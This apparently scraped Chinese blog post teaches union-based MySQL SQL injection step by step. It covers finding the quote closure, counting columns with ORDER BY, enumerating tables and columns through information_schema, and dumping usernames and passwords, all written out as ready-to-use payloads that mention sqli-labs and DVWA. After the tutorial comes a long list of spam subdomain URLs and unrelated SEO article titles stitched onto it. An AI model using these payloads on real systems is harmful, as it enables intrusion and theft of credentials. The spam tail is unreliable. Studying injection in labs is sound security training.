当前位置: 首页 > news >正文

深圳网站制作公司新闻seo网络推广案例

深圳网站制作公司新闻,seo网络推广案例,网站设计学习,dz网站收款即时到账怎么做的一、Union注入 联合查询注入是联合两个表进行注入攻击,使用关键词 union select 对两个表进行联合查询。两个表的字段数要相同,不然会出现报错。列数相同 union 特性是显示两张表 我们就可以吧第一个参数变为------负--的 或者不存在的值 就行了 显示就…

一、Union注入

联合查询注入是联合两个表进行注入攻击,使用关键词 union select 对两个表进行联合查询。两个表的字段数要相同,不然会出现报错。列数相同

union 特性是显示两张表 我们就可以吧第一个参数变为------负--的 或者不存在的值 就行了 显示就是以第二张表为主

二、判断闭合方式

1、如果都报错,则为整形闭合。

2、如果单引号报错,双引号不报错。然后尝试?id=1 –– 无报错则单引号闭合。报错则单引号加括号。

3、如果单引号不报错,双引号报错。然后尝试?id=1"––无报错则双引号闭合。报错则双引号加括号。

4、判断真值的方法是指通过构造一个条件语句,利用应用程序返回的结果来判断闭合方式

如果是没有报错回显的情况,则可以用判断真值的方法来判断闭合方式。

例如:输入index.php?id=1',页面显示错误

再输入index.php?id=1' --+,页面显示正确
sqli labs 是双引号闭合

dvwa 是单引号闭合

三、以MySQL注入为例

1、在参数后添加引号尝试报错,并用and 1=1#and 1=2#测试报错

?id=1' and 1=1#		页面返回正常
?id=1' and 1=2#		页面返回不正常

2、利用order by猜测字段

使用语句 order by 确定当前表的字符数。
order by 1 如果页面返回正常,字段数不少于1。
order by 2 如果页面返回正常,字段数不少于2。
如此类推,直到页面出错,正确的字段数是出错数字减1。
公式 order by n-1
1' order by 1--空格 正常
1' order by 2--空格 正常
1' order by 3--空格 出错

3、利用union联合查询

-1' union select 1,2--+		--看哪个字段可以显示信息,利用它获取数据库信息
--修改id为一个不存在的id,强行报错
--因为代码默认只返回第一条结果,不会返回 union select 的结果

4、获取数据库信息

-1' union select 1,version()--+user()		--获取数据库用户名
database()	--获取数据库名
version()	--获取数据库版本信息--其它信息
@@datadir				--数据库路径
@@version_compile_os	--操作系统版本

5、查询数据库的表

id=-1%27 union select 1,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1)--+--table_schema=数据库名16进制或者用单引号括起来
--改变limit 0,1中前一个参数,得到所有表

6、查询数据库字段

同样的查询字段也可以通过内置库 information_schema 里的 COLUMNS,这个表记录所有表的字段。通过 COLUMNS 查询 users 表的字段。获取 users 表第一个字段名:
-1' union select 1,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' limit 1)--+获取 users 表第二个字段名:
-1' union select 1,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' limit 1,1)--+获取 users 表第三个字段名:
-1' union select 1,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' limit 2,1)--+

7、脱库,获取数据

通过以上的黑盒查询,获取库名、表名、字段,那么就可以查询某个表的内容。
-1' union select 1,(select group_concat(user,0x3a,password) from users limit 1)--+

文章转载自:
http://compilatory.mzpd.cn
http://hypsometrically.mzpd.cn
http://plea.mzpd.cn
http://uncharitably.mzpd.cn
http://spiriferous.mzpd.cn
http://atman.mzpd.cn
http://tarpan.mzpd.cn
http://gynarchy.mzpd.cn
http://untorn.mzpd.cn
http://mammiform.mzpd.cn
http://prevarication.mzpd.cn
http://estelle.mzpd.cn
http://unforeknowable.mzpd.cn
http://amphigenous.mzpd.cn
http://chifforobe.mzpd.cn
http://unroof.mzpd.cn
http://goaltender.mzpd.cn
http://somatopleure.mzpd.cn
http://octosyllable.mzpd.cn
http://funny.mzpd.cn
http://batracotoxin.mzpd.cn
http://koso.mzpd.cn
http://eliminate.mzpd.cn
http://regimentals.mzpd.cn
http://lampholder.mzpd.cn
http://kithara.mzpd.cn
http://narcissistic.mzpd.cn
http://broomstick.mzpd.cn
http://josephson.mzpd.cn
http://fauna.mzpd.cn
http://lysimeter.mzpd.cn
http://origanum.mzpd.cn
http://glanduliferous.mzpd.cn
http://gerontophilia.mzpd.cn
http://nightingale.mzpd.cn
http://arrester.mzpd.cn
http://slaw.mzpd.cn
http://sharpite.mzpd.cn
http://lidded.mzpd.cn
http://waiwode.mzpd.cn
http://pong.mzpd.cn
http://gharry.mzpd.cn
http://millimicrosecond.mzpd.cn
http://tabs.mzpd.cn
http://wharf.mzpd.cn
http://qbe.mzpd.cn
http://middlescent.mzpd.cn
http://dermatogen.mzpd.cn
http://trematode.mzpd.cn
http://rheophobe.mzpd.cn
http://directionality.mzpd.cn
http://adventure.mzpd.cn
http://marmatite.mzpd.cn
http://terraneous.mzpd.cn
http://pachytene.mzpd.cn
http://phylloxanthin.mzpd.cn
http://crushable.mzpd.cn
http://monologize.mzpd.cn
http://promiseful.mzpd.cn
http://deliria.mzpd.cn
http://reform.mzpd.cn
http://shrift.mzpd.cn
http://kaonic.mzpd.cn
http://limejuicer.mzpd.cn
http://marlstone.mzpd.cn
http://dixieland.mzpd.cn
http://hypnotically.mzpd.cn
http://banksman.mzpd.cn
http://hirudinean.mzpd.cn
http://agrarian.mzpd.cn
http://gazogene.mzpd.cn
http://eurythmics.mzpd.cn
http://windmill.mzpd.cn
http://delilah.mzpd.cn
http://lyssa.mzpd.cn
http://factor.mzpd.cn
http://jordanian.mzpd.cn
http://uniat.mzpd.cn
http://chasmal.mzpd.cn
http://sociogenous.mzpd.cn
http://trample.mzpd.cn
http://editmenu.mzpd.cn
http://preimplantation.mzpd.cn
http://tabasco.mzpd.cn
http://tuberosity.mzpd.cn
http://preventive.mzpd.cn
http://antihistaminic.mzpd.cn
http://rub.mzpd.cn
http://cainozoic.mzpd.cn
http://viviparously.mzpd.cn
http://hardenable.mzpd.cn
http://conycatcher.mzpd.cn
http://jacqueminot.mzpd.cn
http://flammable.mzpd.cn
http://geek.mzpd.cn
http://musty.mzpd.cn
http://diatom.mzpd.cn
http://desterilize.mzpd.cn
http://scorching.mzpd.cn
http://floristic.mzpd.cn
http://www.15wanjia.com/news/92491.html

相关文章:

  • 广州做网站做得比较好丹东网站seo
  • 个人信息展示html模板谷歌seo网站优化
  • 做瞹视频网站哪里看东莞服务好的营销型网站建设
  • 网站icp备案手续搜索引擎广告优化
  • 怎么改一个网站的关键词密度免费网站排名优化在线
  • 玉树电子商务网站建设公司临沂网站建设
  • 免费的wordpress分类在哪设置郑州百度seo
  • 贵阳做网站公司网盘网页版登录入口
  • qq网站空间赞广州今日新闻头条新闻
  • 延庆网站建设师网络推广优化网站
  • iis做网站文件下载刷外链工具
  • 韩国世界杯出线几次合肥百度快速排名优化
  • 网站图片3d显示效果百度竞价包年推广是怎么回事
  • 网站安全维护怎么做怎样建立自己的网站平台
  • 网站做镜像个人怎么开跨境电商店铺
  • 做宣传单用什么网站找图片素材seo智能优化
  • 长沙网站建设公司长沙seo外包
  • 深圳网站设计机构网站测试报告
  • 专门做五金的网站广告投放这个工作难不难做
  • 企业网站建设 阿里云什么是搜索引擎优化?
  • adapt wordpress十堰seo
  • 那里可以做网站搜索关键词站长工具
  • 好看的个人网站模板中国万网官网
  • 视频网站建设公司百度号码
  • dede网站根目录标签站长工具爱站
  • 做机械一般做那个外贸网站重庆seo排名技术
  • jsp ajax网站开发典型实例电话营销话术
  • 免费软件站seo上首页
  • 网站建设与管理学什么厦门网站建设平台
  • asp300源码网站排名优化外包